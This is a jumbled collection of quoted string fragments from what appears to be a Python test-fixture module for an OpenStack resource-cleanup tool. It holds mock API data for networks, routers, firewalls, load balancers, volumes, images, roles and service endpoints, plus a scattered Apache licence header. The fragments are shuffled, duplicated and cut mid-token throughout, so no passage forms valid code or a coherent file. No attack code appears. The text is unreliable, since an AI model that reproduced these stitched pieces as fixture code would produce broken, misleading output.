"u'45baf976-c20a-4894-a7c3-c94b7376bf55'} ] } ROUTERS_LIST = { \"routers\": [{ \"status\": \"ACTIVE\", \"external_gateway_info\": {\"network_id\": \"3c5bcddd-6af9-4e6b-9c3e-c153e521cab8\"},",
"\"member test1\", \"pool_id\": LBAAS_POOL_IDS[1] } ] } FIREWALL_LIST = { \"firewalls\": [ {",
"= { \"metering_labels\": [ { \"tenant_id\": PROJECT_ID, \"description\": \"Meter label test1\", \"name\": \"Meterlabel1\",",
"'endpoints_links': [], 'name': 'Compute Service', 'type': 'compute' }, { 'endpoints': [{ 'adminURL': 'http://admin:8773/services/Admin',",
"\"ip_address\": \"10.0.0.4\", \"subnet_id\": \"51351eb9-7ce5-42cf-89cd-cea0b0fc510f\" } ], \"id\": UNBOUND_PORT_ID, \"mac_address\": \"fa:16:3e:f5:62:22\", \"name\": \"custom unbound",
"\"id\": FIREWALL_IDS[1], \"description\": \"\" } ] } METERING_LABEL_LIST = { \"metering_labels\": [ {",
"FIREWALL_POLICY_IDS[0], \"description\": \"Testing firewall policy 1\" }, { \"name\": \"TestFireWallPolicy2\", \"firewall_rules\": [FIREWALL_RULE_IDS[1]], \"tenant_id\":",
"} } ROLE_LIST = {u'roles': [ {u'id': u'201c290919ec4d6bb350401f8b4145a3', u'name': u'heat_stack_owner'}, {u'id': u'edc12489faa74ee0aca0b8a0b4d74a74', u'name':",
"\"metadata\": { \"My Server Name\": \"Apache1\" }, \"name\": \"new-server-test\", \"progress\": 0, \"status\": \"ACTIVE\",",
"-*- # # Copyright © 2014 Cloudwatt # # Licensed under the Apache",
"\"admin_state_up\": True, \"tenant_id\": PROJECT_ID, \"firewall_policy_id\": FIREWALL_POLICY_IDS[1], \"id\": FIREWALL_IDS[1], \"description\": \"\" } ] }",
"\"id\": \"7177abc4-5ae9-4bb7-b0d4-89e94a4abf3b\" }] } ROUTER_CLEAR_GATEWAY = { \"router\": { \"status\": \"ACTIVE\", \"external_gateway_info\": None,",
"\"name\": \"custom\", \"security_group_rules\": [ { \"direction\": \"egress\", \"ethertype\": \"IPv6\", \"id\": \"3c0e45ff-adaf-4124-b083-bf390e5482ff\", \"port_range_max\": None,",
"\"shared\": False }, { \"status\": \"ACTIVE\", \"subnets\": [\"e12f0c45-46e3-446a-b207-9474b27687a6\"], \"name\": \"network_3\", \"admin_state_up\": True, \"tenant_id\":",
"\"description\": \"\", \"address\": \"10.0.0.125\", \"protocol_port\": 80, \"port_id\": PRIVATE_PORT_IDS[0], \"id\": LBAAS_VIP_IDS[0], \"status_description\": \"\", \"name\":",
"\"766110ac-0fde-4c31-aed7-72a97e78310b\" ], \"status\": \"DOWN\", \"tenant_id\": PROJECT_ID }, { \"admin_state_up\": True, \"allowed_address_pairs\": [], \"binding:capabilities\":",
"'network' }, { 'endpoints': [{ 'adminURL': 'http://ceilometer.usr.lab0.aub.cw-labs.net:8777', 'internalURL': METERING_INTERNAL_ENDPOINT, 'publicURL': METERING_PUBLIC_ENDPOINT, 'region': 'RegionOne'}],",
"{ \"private\": [ { \"addr\": \"192.168.0.3\", \"version\": 4 } ] }, \"created\": \"2012-09-07T16:56:37Z\",",
"{u'id': u'201c290919ec4d6bb350401f8b4145a3', u'name': u'heat_stack_owner'}, {u'id': u'edc12489faa74ee0aca0b8a0b4d74a74', u'name': u'Member'}, {u'id': u'6c3ceb6e6112486ba1465a636652b544', u'name': u'ResellerAdmin'}, {u'id':",
"IS\" BASIS, WITHOUT # WARRANTIES OR CONDITIONS OF ANY KIND, either express or",
"\"external_gateway_info\": {\"network_id\": \"3c5bcddd-6af9-4e6b-9c3e-c153e521cab8\"}, \"name\": \"router1\", \"admin_state_up\": True, \"tenant_id\": PROJECT_ID, \"id\": ROUTERS_IDS[1] }, {",
"{ \"protocol\": \"tcp\", \"description\": \"Firewall rule 1\", \"source_port\": None, \"source_ip_address\": None, \"destination_ip_address\": None,",
"# http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in",
"{ 'serviceCatalog': [{ 'endpoints': [{ 'adminURL': 'http://admin:8776/v1/225da22d3ce34b15877ea70b2a575f58', 'internalURL': VOLUME_INTERNAL_ENDPOINT, 'publicURL': VOLUME_PUBLIC_ENDPOINT, 'region': 'RegionOne'}],",
"PROJECT_ID, \"binding:vif_type\": \"ovs\", \"device_owner\": \"network:router_gateway\", \"binding:capabilities\": { \"port_filter\": False }, \"mac_address\": \"fa:16:3e:b9:ef:05\", \"fixed_ips\":",
"\"protocol_port\": 80, \"port_id\": PRIVATE_PORT_IDS[1], \"id\": LBAAS_VIP_IDS[1], \"status_description\": \"\", \"name\": \"test-http-vip\", \"admin_state_up\": True, \"tenant_id\":",
"\"network_id\": \"bf8d2e1f-221e-4908-a4ed-b6c0fd06e518\", \"security_groups\": [ \"766110ac-0fde-4c31-aed7-72a97e78310b\" ], \"status\": \"DOWN\", \"tenant_id\": PROJECT_ID }, { \"admin_state_up\":",
"\"device_id\": \"\", \"device_owner\": \"\", \"extra_dhcp_opts\": [], \"fixed_ips\": [ { \"ip_address\": \"10.0.0.4\", \"subnet_id\": \"51351eb9-7ce5-42cf-89cd-cea0b0fc510f\"",
"\"1\", \"links\": [ { \"href\": \"http://openstack.example.com/openstack/flavors/1\", \"rel\": \"bookmark\" } ] }, \"hostId\": \"16d193736a5cfdb60c697ca27ad071d6126fa13baeb670fc9d10645e\",",
"ROUTERS_LIST = { \"routers\": [{ \"status\": \"ACTIVE\", \"external_gateway_info\": {\"network_id\": \"3c5bcddd-6af9-4e6b-9c3e-c153e521cab8\"}, \"name\": \"second_routers\", \"admin_state_up\":",
"None, \"protocol\": None, \"remote_group_id\": \"85cc3048-abc3-43cc-89b3-377341426ac5\", \"remote_ip_prefix\": None, \"security_group_id\": \"12345678-1234-1234-1234-123456789012\", \"tenant_id\": PROJECT_ID } ],",
"\"stacks\": [ { \"description\": \"First test\", \"links\": [ { \"href\": \"http://site/5c136348-5550-4ec5-8bd6-b83241844db3\", \"rel\": \"self\"",
"either express or implied. See the # License for the specific language governing",
"10, u'status': u'available', u'volume_id': u'45baf976-c20a-4894-a7c3-c94b7376bf55'} ] } ROUTERS_LIST = { \"routers\": [{ \"status\":",
"NETWORK_INTERNAL_ENDPOINT = 'http://neutron.usr.lab0.aub.cw-labs.net:9696' COMPUTE_INTERNAL_ENDPOINT = 'http://nova.usr.lab0.aub.cw-labs.net:8774/v2/43c9e28327094e1b81484f4b9aee74d5' METERING_INTERNAL_ENDPOINT = 'http://ceilometer.usr.lab0.aub.cw-labs.net:8777' ORCHESTRATION_INTERNAL_ENDPOINT = 'http://heat.usr.lab0.aub.cw-labs.net:8004/v1' AUTH_URL_RESPONSE",
"[\"firebcc3-d831-411d-a073-ddc828a7a9id\", \"fi7815f5b-a328-47cb-a5e5-f139c4e476f7\"] FIREWALL_POLICY_IDS = [\"firebcc3-d831-422d-a073-ccc818a7a9id\", \"poa119a8-d25b-45a7-8d1b-88e127885630\"] FIREWALL_IDS = [\"firewal1-d831-422d-a073-ckc818a7a9ab\", \"firewa1l-d831-422d-a073-ckc818a7a9ab\"] METERING_LABEL_IDS = [\"mbcdb45e-45fe-4e04-8704-bf6f58760011\",",
"\"name\": \"nova\", \"admin_state_up\": True, \"tenant_id\": PROJECT_ID, \"id\": NETWORKS_IDS[1], \"shared\": False }, { \"status\":",
"}, { 'endpoints': [{ 'adminURL': 'http://admin:9292/v1', 'internalURL': IMAGE_INTERNAL_ENDPOINT, 'publicURL': IMAGE_PUBLIC_ENDPOINT, 'region': 'RegionOne'}], 'endpoints_links':",
"\"CirrOS v0.3.0\", \"id\": VOLUMES_IDS[1], \"metadata\": {}, \"size\": 1, \"snapshot_id\": None, \"source_volid\": None, \"status\":",
"\"id\": SNAPSHOTS_IDS[0], \"display_name\": \"snap-001\", \"display_description\": \"Daily backup\", \"volume_id\": \"521752a6-acf6-4b2d-bc7a-119f9148cd8c\", \"status\": \"available\", \"size\": 10,",
"\"85cc3048-abc3-43cc-89b3-377341426ac5\", \"remote_ip_prefix\": None, \"security_group_id\": \"12345678-1234-1234-1234-123456789012\", \"tenant_id\": PROJECT_ID } ], \"tenant_id\": PROJECT_ID } ]",
"\"ami\", \"id\": \"37717f53-3707-49b9-9dd0-fd063e6b9fc5\", \"is_public\": True, \"min_disk\": 0, \"min_ram\": 0, \"name\": \"cirros-0.3.1-x86_64-uec\", \"owner\": PROJECT_ID,",
"\"\", \"stack_name\": \"stack2\", \"creation_time\": \"2015-03-03T17:34:21Z\", \"updated_time\": None, \"stack_status\": \"DELETE_FAILED\", \"id\": \"ec4083c1-3667-47d2-91c9-ce0bc8e3c2b9\" } ]",
"None, \"status\": \"available\", \"volume_type\": \"None\" } ] } SNAPSHOTS_LIST = { \"snapshots\": [",
"\"binding:host_id\": \"\", \"binding:vif_type\": \"unbound\", \"device_id\": \"\", \"device_owner\": \"compute:azerty\", \"extra_dhcp_opts\": [], \"fixed_ips\": [ {",
"[], 'name': 'Image Service', 'type': 'image' }, { 'endpoints': [{ 'adminURL': 'http://admin:8774/v2/225da22d3ce34b15877ea70b2a575f58', 'internalURL':",
"\"protocol_port\": 80, \"tenant_id\": PROJECT_ID, \"admin_state_up\": True, \"weight\": 1, \"status\": \"ACTIVE\", \"status_description\": \"member test1\",",
"80, \"port_id\": PRIVATE_PORT_IDS[0], \"id\": LBAAS_VIP_IDS[0], \"status_description\": \"\", \"name\": \"test-http-vip\", \"admin_state_up\": True, \"tenant_id\": PROJECT_ID,",
"\"c0b09f00-1d49-4e64-a0a7-8a186d928138\", \"port_range_max\": None, \"port_range_min\": None, \"protocol\": None, \"remote_group_id\": \"85cc3048-abc3-43cc-89b3-377341426ac5\", \"remote_ip_prefix\": None, \"security_group_id\": \"12345678-1234-1234-1234-123456789012\",",
"PROJECT_ID, \"properties\": {}, \"protected\": False, \"size\": 3714968, \"status\": \"active\", \"updated_at\": \"2014-02-03T14:13:53\" } ]",
"\"floating_ip_address\": \"172.24.4.227\", \"port_id\": None, \"id\": FLOATING_IPS_IDS[1] } ] } LBAAS_HEALTHMONITOR_LIST = { \"health_monitors\":",
"}, { 'endpoints': [{ 'adminURL': 'http://admin:8080', 'internalURL': STORAGE_INTERNAL_ENDPOINT, 'publicURL': STORAGE_PUBLIC_ENDPOINT, 'region': 'RegionOne'}], 'endpoints_links':",
"\"second_routers\", \"admin_state_up\": True, \"tenant_id\": PROJECT_ID, \"id\": ROUTERS_IDS[0] }, { \"status\": \"ACTIVE\", \"external_gateway_info\": {\"network_id\":",
"COMPUTE_INTERNAL_ENDPOINT, 'publicURL': COMPUTE_PUBLIC_ENDPOINT, 'region': 'RegionOne'}], 'endpoints_links': [], 'name': 'Compute Service', 'type': 'compute' },",
"False, \"shared\": False, \"id\": FIREWALL_POLICY_IDS[1], \"description\": \"Testing firewall policy 2\" } ] }",
"'endpoints_links': [], 'name': 'Object Storage Service', 'type': 'object-store' }, { 'endpoints': [{ 'adminURL':",
"} ] } ROUTER1_PORTS = { \"ports\": [ { \"status\": \"DOWN\", \"name\": \"\",",
"u'b6673106f5c64c0cbc1970ad706d38c0', u'name': u'anotherrole'}] } STORAGE_CONTAINERS_LIST = [ { \"count\": 0, \"bytes\": 0, \"name\":",
"'internalURL': ORCHESTRATION_INTERNAL_ENDPOINT, 'publicURL': ORCHESTRATION_PUBLIC_ENDPOINT, 'region': 'RegionOne'}], 'endpoints_links': [], 'name': 'Orchestration service', 'type': 'orchestration'",
"{ \"status\": \"ACTIVE\", \"subnets\": [\"a318fcb4-9ff0-4485-b78c-9e6738c21b26\"], \"name\": \"private\", \"admin_state_up\": True, \"tenant_id\": PROJECT_ID, \"id\": NETWORKS_IDS[0],",
"on an \"AS IS\" BASIS, WITHOUT # WARRANTIES OR CONDITIONS OF ANY KIND,",
"specific language governing permissions and limitations # under the License. TOKEN_ID = '<KEY>'",
"{ \"pools\": [ { \"status\": \"ACTIVE\", \"lb_method\": \"ROUND_ROBIN\", \"protocol\": \"HTTP\", \"description\": \"\", \"health_monitors\":",
"\"direction\": \"egress\", \"ethertype\": \"IPv4\", \"id\": \"93aa42e5-80db-4581-9391-3a608bd0e448\", \"port_range_max\": None, \"port_range_min\": None, \"protocol\": None, \"remote_group_id\":",
"[{ 'adminURL': 'http://admin:8080', 'internalURL': STORAGE_INTERNAL_ENDPOINT, 'publicURL': STORAGE_PUBLIC_ENDPOINT, 'region': 'RegionOne'}], 'endpoints_links': [], 'name': 'Object",
"None, \"security_group_id\": \"85cc3048-abc3-43cc-89b3-377341426ac5\", \"tenant_id\": PROJECT_ID }, { \"direction\": \"ingress\", \"ethertype\": \"IPv4\", \"id\": \"f7d45c89-008e-4bab-88ad-d6811724c51c\",",
"} STORAGE_CONTAINERS_LIST = [ { \"count\": 0, \"bytes\": 0, \"name\": STORAGE_CONTAINERS[0] }, {",
"\"fixed_ips\": [ { \"subnet_id\": \"aca4d43c-c48c-4a2c-9bb6-ba374ef7e135\", \"ip_address\": \"172.24.4.226\" } ], \"id\": \"c5ca7017-c390-4ccc-8cd7-333747e57fef\", \"device_id\": ROUTERS_IDS[1]",
"u'service'}, {u'id': u'972b51c620fe481e8e37682d8b5dbd1b', u'name': u'admin'}, {u'id': u'9c3698e2f6a34d59b45d969d78403942', u'name': u'heat_stack_user'}, {u'id': u'9fe2ff9ee4384b1894a90878d3e92bab', u'name': u'_member_'},",
"PROJECT_ID = '225da22d3ce34b15877ea70b2a575f58' AUTH_URL = \"http://localhost:5000/v2.0\" ROLE_URL = \"http://admin:35357/v2.0/OS-KSADM\" VOLUME_PUBLIC_ENDPOINT = 'http://public:8776/v1/225da22d3ce34b15877ea70b2a575f58' IMAGE_PUBLIC_ENDPOINT",
"\"source_volid\": None, \"status\": \"available\", \"volume_type\": \"None\" } ] } SNAPSHOTS_LIST = { \"snapshots\":",
"\"protected\": False, \"size\": 3714968, \"status\": \"active\", \"updated_at\": \"2014-02-03T14:13:53\" } ] } ALARMS_LIST =",
"\"name\": \"Test-Pools\", \"health_monitors_status\": [], \"members\": [], \"provider\": \"haproxy\", \"status_description\": None, \"id\": LBAAS_POOL_IDS[0] },",
"'Object Storage Service', 'type': 'object-store' }, { 'endpoints': [{ 'adminURL': 'http://neutron.usr.lab0.aub.cw-labs.net:9696', 'internalURL': NETWORK_INTERNAL_ENDPOINT,",
"OR CONDITIONS OF ANY KIND, either express or implied. See the # License",
"\"2014-02-03T14:13:53\" } ] } ALARMS_LIST = [ { \"alarm_actions\": [ \"http://site:8000/alarm\" ], \"alarm_id\":",
"obtain # a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # #",
"= \"http://admin:35357/v2.0/OS-KSADM\" VOLUME_PUBLIC_ENDPOINT = 'http://public:8776/v1/225da22d3ce34b15877ea70b2a575f58' IMAGE_PUBLIC_ENDPOINT = 'http://public:9292' STORAGE_PUBLIC_ENDPOINT = 'http://public:8080/v1/AUTH_ee5b90900a4b4e85938b0ceadf4467f8' NETWORK_PUBLIC_ENDPOINT =",
"\"delay\": 5, \"expected_codes\": \"200\", \"max_retries\": 5, \"http_method\": \"GET\", \"timeout\": 2, \"pools\": [], \"url_path\":",
"STORAGE_INTERNAL_ENDPOINT = 'http://internal:8080/v1/AUTH_ee5b90900a4b4e85938b0ceadf4467f8' NETWORK_INTERNAL_ENDPOINT = 'http://neutron.usr.lab0.aub.cw-labs.net:9696' COMPUTE_INTERNAL_ENDPOINT = 'http://nova.usr.lab0.aub.cw-labs.net:8774/v2/43c9e28327094e1b81484f4b9aee74d5' METERING_INTERNAL_ENDPOINT = 'http://ceilometer.usr.lab0.aub.cw-labs.net:8777' ORCHESTRATION_INTERNAL_ENDPOINT",
"[], \"availability_zone\": \"nova\", \"bootable\": \"false\", \"created_at\": \"2014-02-03T14:22:52.000000\", \"display_description\": None, \"display_name\": \"toto\", \"id\": VOLUMES_IDS[0],",
"u'ResellerAdmin'}, {u'id': u'7e9fd9336bc24936b3bbde15d1dd8f64', u'name': u'service'}, {u'id': u'972b51c620fe481e8e37682d8b5dbd1b', u'name': u'admin'}, {u'id': u'9c3698e2f6a34d59b45d969d78403942', u'name': u'heat_stack_user'},",
"] }, \"hostId\": \"16d193736a5cfdb60c697ca27ad071d6126fa13baeb670fc9d10645e\", \"id\": SERVERS_IDS[0], \"image\": { \"id\": \"70a599e0-31e7-49b7-b260-868f441e862b\", \"links\": [ {",
"# Licensed under the Apache License, Version 2.0 (the \"License\"); you may #",
"\"status_description\": None, \"id\": LBAAS_POOL_IDS[1] } ] } LBAAS_MEMBER_LIST = { \"members\": [ {",
"\"pool_id\": LBAAS_POOL_IDS[1] } ] } FIREWALL_LIST = { \"firewalls\": [ { \"status\": \"ACTIVE\",",
"\"expected_codes\": \"200\", \"max_retries\": 5, \"http_method\": \"GET\", \"timeout\": 2, \"pools\": [], \"url_path\": \"/\", \"type\":",
"= [\"3fbbcccf-d058-4502-8844-6feeffdf4cb5\", \"e479997c-650b-40a4-9dfe-77655818b0d2\"] VOLUME_BACKUP_IDS = [\"803a2ad2-893b-4b42-90d9-eb5f09a8421a\"] ROUTERS_IDS = [\"7177abc4-5ae9-4bb7-b0d4-89e94a4abf3b\", \"a9254bdb-2613-4a13-ac4c-adc581fba50d\"] PORTS_IDS = [\"d7815f5b-a228-47bb-a5e5-f139c4e476f6\"]",
"} ] } IMAGES_LIST = { \"images\": [ { \"checksum\": \"f8a2eeee2dc65b3d9b6e63678955bd83\", \"container_format\": \"ami\",",
"\"abcdb45e-45fe-4e04-8704-bf6f58760000\" PRIVATE_PORT_IDS = [\"p7815f5b-a228-47bb-a5e5-f139c4f476ft\", \"p78o5f5t-a228-47bb-a5e2-f139c4f476ft\"] FIREWALL_RULE_IDS = [\"firebcc3-d831-411d-a073-ddc828a7a9id\", \"fi7815f5b-a328-47cb-a5e5-f139c4e476f7\"] FIREWALL_POLICY_IDS = [\"firebcc3-d831-422d-a073-ccc818a7a9id\", \"poa119a8-d25b-45a7-8d1b-88e127885630\"]",
"\"deleted\": False, \"deleted_at\": None, \"disk_format\": \"ami\", \"id\": \"37717f53-3707-49b9-9dd0-fd063e6b9fc5\", \"is_public\": True, \"min_disk\": 0, \"min_ram\":",
"[\"5c136348-5550-4ec5-8bd6-b83241844db3\", \"ec4083c1-3667-47d2-91c9-ce0bc8e3c2b9\"] UNBOUND_PORT_ID = \"abcdb45e-45fe-4e04-8704-bf6f58760000\" PRIVATE_PORT_IDS = [\"p7815f5b-a228-47bb-a5e5-f139c4f476ft\", \"p78o5f5t-a228-47bb-a5e2-f139c4f476ft\"] FIREWALL_RULE_IDS = [\"firebcc3-d831-411d-a073-ddc828a7a9id\", \"fi7815f5b-a328-47cb-a5e5-f139c4e476f7\"]",
"[], 'name': 'Object Storage Service', 'type': 'object-store' }, { 'endpoints': [{ 'adminURL': 'http://neutron.usr.lab0.aub.cw-labs.net:9696',",
"] } SNAPSHOTS_LIST = { \"snapshots\": [ { \"id\": SNAPSHOTS_IDS[0], \"display_name\": \"snap-001\", \"display_description\":",
"0, \"name\": \"cirros-0.3.1-x86_64-uec-ramdisk\", \"owner\": PROJECT_ID, \"properties\": {}, \"protected\": False, \"size\": 3714968, \"status\": \"active\",",
"\"created_at\": \"2012-03-19T01:52:47Z\" } ] } VOLUME_BACKUPS_LIST = { u'backups': [ {u'availability_zone': u'nova', u'container':",
"= [\"45baf976-c20a-4894-a7c3-c94b7376bf55\", \"5aa119a8-d25b-45a7-8d1b-88e127885635\"] SNAPSHOTS_IDS = [\"3fbbcccf-d058-4502-8844-6feeffdf4cb5\", \"e479997c-650b-40a4-9dfe-77655818b0d2\"] VOLUME_BACKUP_IDS = [\"803a2ad2-893b-4b42-90d9-eb5f09a8421a\"] ROUTERS_IDS = [\"7177abc4-5ae9-4bb7-b0d4-89e94a4abf3b\",",
"\"aki\", \"id\": \"4e150966-cbe7-4fd7-a964-41e008d20f10\", \"is_public\": True, \"min_disk\": 0, \"min_ram\": 0, \"name\": \"cirros-0.3.1-x86_64-uec-kernel\", \"owner\": PROJECT_ID,",
"= { \"networks\": [ { \"status\": \"ACTIVE\", \"subnets\": [\"a318fcb4-9ff0-4485-b78c-9e6738c21b26\"], \"name\": \"private\", \"admin_state_up\": True,",
"\"status\": \"DOWN\", \"tenant_id\": \"ANOTHER_PROJECT\" } ]} REMOVE_ROUTER_INTERFACE = { \"id\": \"8604a0de-7f6b-409a-a47c-a1cc7bc77b2e\", \"tenant_id\": \"2f245a7b-796b-4f26-9cf9-9e82d248fda7\",",
"{ \"admin_state_up\": True, \"tenant_id\": PROJECT_ID, \"delay\": 5, \"expected_codes\": \"200\", \"max_retries\": 5, \"http_method\": \"GET\",",
"STACKS_IDS = [\"5c136348-5550-4ec5-8bd6-b83241844db3\", \"ec4083c1-3667-47d2-91c9-ce0bc8e3c2b9\"] UNBOUND_PORT_ID = \"abcdb45e-45fe-4e04-8704-bf6f58760000\" PRIVATE_PORT_IDS = [\"p7815f5b-a228-47bb-a5e5-f139c4f476ft\", \"p78o5f5t-a228-47bb-a5e2-f139c4f476ft\"] FIREWALL_RULE_IDS =",
"'%s/backups/803a2ad2-893b-4b42-90d9-eb5f09a8421a' % VOLUME_PUBLIC_ENDPOINT, u'rel': u'self'}], u'name': u'volumebackup-01', u'object_count': 22, u'size': 10, u'status': u'available',",
"\"lb_method\": \"ROUND_ROBIN\", \"protocol\": \"HTTP\", \"description\": \"\", \"health_monitors\": [], \"subnet_id\": \"b892434a-59f7-4404-a05d-9562977e1678\", \"tenant_id\": PROJECT_ID, \"admin_state_up\":",
"'adminURL': 'http://ceilometer.usr.lab0.aub.cw-labs.net:8777', 'internalURL': METERING_INTERNAL_ENDPOINT, 'publicURL': METERING_PUBLIC_ENDPOINT, 'region': 'RegionOne'}], 'endpoints_links': [], 'name': 'Metering service',",
"Server Name\": \"Apache1\" }, \"name\": \"new-server-test\", \"progress\": 0, \"status\": \"ACTIVE\", \"tenant_id\": \"openstack\", \"updated\":",
"\"482fbcc3-d831-411d-a073-ddc828a7a9ed\"] ALARMS_IDS = [\"ca950223-e982-4552-9dec-5dc5d3ea4172\"] STACKS_IDS = [\"5c136348-5550-4ec5-8bd6-b83241844db3\", \"ec4083c1-3667-47d2-91c9-ce0bc8e3c2b9\"] UNBOUND_PORT_ID = \"abcdb45e-45fe-4e04-8704-bf6f58760000\" PRIVATE_PORT_IDS =",
"\"source_ip_address\": None, \"destination_ip_address\": None, \"firewall_policy_id\": None, \"position\": None, \"destination_port\": \"80\", \"id\": FIREWALL_RULE_IDS[1], \"name\":",
"\"admin_state_up\": True, \"tenant_id\": \"ed680f49ff714162ab3612d7876ffce5\", \"id\": \"afc75773-640e-403c-9fff-62ba98db1f19\", \"shared\": True } ] } SECGROUPS_LIST =",
"\"member test1\", \"pool_id\": LBAAS_POOL_IDS[0] }, { \"id\": LBAAS_MEMBER_IDS[1], \"address\": \"10.0.0.123\", \"protocol_port\": 80, \"tenant_id\":",
"\"status\": \"DOWN\", \"name\": \"\", \"admin_state_up\": True, \"network_id\": \"ebda9658-093b-41ba-80ce-0cf8cb8365d4\", \"tenant_id\": PROJECT_ID, \"binding:vif_type\": \"ovs\", \"device_owner\":",
"}] } ROUTER_CLEAR_GATEWAY = { \"router\": { \"status\": \"ACTIVE\", \"external_gateway_info\": None, \"name\": \"second_routers\",",
"may obtain # a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 #",
"\"cirros-0.3.1-x86_64-uec-ramdisk\", \"owner\": PROJECT_ID, \"properties\": {}, \"protected\": False, \"size\": 3714968, \"status\": \"active\", \"updated_at\": \"2014-02-03T14:13:53\"",
"'region': 'RegionOne'}], 'endpoints_links': [], 'name': 'Metering service', 'type': 'metering' }, { 'endpoints': [{",
"22, u'size': 10, u'status': u'available', u'volume_id': u'45baf976-c20a-4894-a7c3-c94b7376bf55'} ] } ROUTERS_LIST = { \"routers\":",
"\"ce705c24-c1ef-408a-bda3-7bbd946164ab\", \"id\": FLOATING_IPS_IDS[0] }, { \"router_id\": None, \"tenant_id\": PROJECT_ID, \"floating_network_id\": \"376da547-b977-4cfe-9cba-275c80debf57\", \"fixed_ip_address\": None,",
"test2\", \"name\": \"Meterlabel2\", \"id\": METERING_LABEL_IDS[1] } ] } FIREWALL_POLICY_LIST = { \"firewall_policies\": [",
"\"tenant_id\": PROJECT_ID, \"description\": \"Meter label test1\", \"name\": \"Meterlabel1\", \"id\": METERING_LABEL_IDS[0] }, { \"tenant_id\":",
"\"admin_state_up\": True, \"weight\": 1, \"status\": \"ACTIVE\", \"status_description\": \"member test1\", \"pool_id\": LBAAS_POOL_IDS[1] } ]",
"[ { \"href\": \"http://site/ec4083c1-3667-47d2-91c9-ce0bc8e3c2b9\", \"rel\": \"self\" } ], \"stack_status_reason\": \"\", \"stack_name\": \"stack2\", \"creation_time\":",
"\"4e150966-cbe7-4fd7-a964-41e008d20f10\", \"482fbcc3-d831-411d-a073-ddc828a7a9ed\"] ALARMS_IDS = [\"ca950223-e982-4552-9dec-5dc5d3ea4172\"] STACKS_IDS = [\"5c136348-5550-4ec5-8bd6-b83241844db3\", \"ec4083c1-3667-47d2-91c9-ce0bc8e3c2b9\"] UNBOUND_PORT_ID = \"abcdb45e-45fe-4e04-8704-bf6f58760000\" PRIVATE_PORT_IDS",
"VOLUME_PUBLIC_ENDPOINT = 'http://public:8776/v1/225da22d3ce34b15877ea70b2a575f58' IMAGE_PUBLIC_ENDPOINT = 'http://public:9292' STORAGE_PUBLIC_ENDPOINT = 'http://public:8080/v1/AUTH_ee5b90900a4b4e85938b0ceadf4467f8' NETWORK_PUBLIC_ENDPOINT = 'https://network0.cw-labs.net' COMPUTE_PUBLIC_ENDPOINT",
"\"name\": \"\", \"tenant_id\": PROJECT_ID, \"enabled\": True, \"action\": \"allow\", \"ip_version\": 4, \"shared\": False }",
"{u'roles': [ {u'id': u'201c290919ec4d6bb350401f8b4145a3', u'name': u'heat_stack_owner'}, {u'id': u'edc12489faa74ee0aca0b8a0b4d74a74', u'name': u'Member'}, {u'id': u'6c3ceb6e6112486ba1465a636652b544', u'name':",
"\"id\": SERVERS_IDS[0], \"image\": { \"id\": \"70a599e0-31e7-49b7-b260-868f441e862b\", \"links\": [ { \"href\": \"http://openstack.example.com/openstack/images/70a599e0-31e7-49b7-b260-868f441e862b\", \"rel\": \"bookmark\"",
"\"51351eb9-7ce5-42cf-89cd-cea0b0fc510f\" } ], \"id\": \"61c1b45e-45fe-4e04-8704-bf6f5876607d\", \"mac_address\": \"fa:16:3e:f5:62:22\", \"name\": \"custom unbound port\", \"network_id\": \"bf8d2e1f-221e-4908-a4ed-b6c0fd06e518\",",
"FIREWALL_IDS[0], \"description\": \"\" }, { \"status\": \"ACTIVE\", \"name\": \"fwass-test-2\", \"admin_state_up\": True, \"tenant_id\": PROJECT_ID,",
"[ {u'id': u'201c290919ec4d6bb350401f8b4145a3', u'name': u'heat_stack_owner'}, {u'id': u'edc12489faa74ee0aca0b8a0b4d74a74', u'name': u'Member'}, {u'id': u'6c3ceb6e6112486ba1465a636652b544', u'name': u'ResellerAdmin'},",
"PROJECT_ID, \"firewall_policy_id\": FIREWALL_POLICY_IDS[1], \"id\": FIREWALL_IDS[1], \"description\": \"\" } ] } METERING_LABEL_LIST = {",
"} ROUTERS_LIST = { \"routers\": [{ \"status\": \"ACTIVE\", \"external_gateway_info\": {\"network_id\": \"3c5bcddd-6af9-4e6b-9c3e-c153e521cab8\"}, \"name\": \"second_routers\",",
"\"owner\": PROJECT_ID, \"properties\": {}, \"protected\": False, \"size\": 4955792, \"status\": \"active\", \"updated_at\": \"2014-02-03T14:13:52\" },",
"\"b892434a-49f7-4404-a05d-9562977e1678\", \"connection_limit\": -1, \"pool_id\": LBAAS_POOL_IDS[1], \"session_persistence\": None } ] } LBAAS_POOL_LIST = {",
"'marktwain'] STORAGE_OBJECTS = [{'container': 'janeausten', 'name': 'foo'}, {'container': 'janeausten', 'name': 'bar'}, {'container': 'marktwain',",
"\"tenant_id\": PROJECT_ID }, { \"direction\": \"egress\", \"ethertype\": \"IPv4\", \"id\": \"93aa42e5-80db-4581-9391-3a608bd0e448\", \"port_range_max\": None, \"port_range_min\":",
"\"address\": \"10.0.0.122\", \"protocol_port\": 80, \"tenant_id\": PROJECT_ID, \"admin_state_up\": True, \"weight\": 1, \"status\": \"ACTIVE\", \"status_description\":",
"u'nova', u'container': u'volumebackups', u'created_at': u'2015-09-22T14:59:03.000000', u'description': u'A Volume Backup', u'fail_reason': None, u'id': u'803a2ad2-893b-4b42-90d9-eb5f09a8421a',",
"\"security_group_id\": \"85cc3048-abc3-43cc-89b3-377341426ac5\", \"tenant_id\": PROJECT_ID }, { \"direction\": \"egress\", \"ethertype\": \"IPv4\", \"id\": \"93aa42e5-80db-4581-9391-3a608bd0e448\", \"port_range_max\":",
"\"172.24.4.227\" } ], \"id\": \"664ebd1a-facd-4c20-948c-07a784475ab0\", \"device_id\": ROUTERS_IDS[0] } ] } ROUTER1_PORTS = {",
"\"binding:capabilities\": { \"port_filter\": False }, \"binding:host_id\": \"\", \"binding:vif_type\": \"unbound\", \"device_id\": \"\", \"device_owner\": \"\",",
"\"tenant_id\": \"ed680f49ff714162ab3612d7876ffce5\", \"id\": \"afc75773-640e-403c-9fff-62ba98db1f19\", \"shared\": True } ] } SECGROUPS_LIST = { \"security_groups\":",
"True, \"tenant_id\": PROJECT_ID, \"id\": ROUTERS_IDS[0] }, { \"status\": \"ACTIVE\", \"external_gateway_info\": {\"network_id\": \"3c5bcddd-6af9-4e6b-9c3e-c153e521cab8\"}, \"name\":",
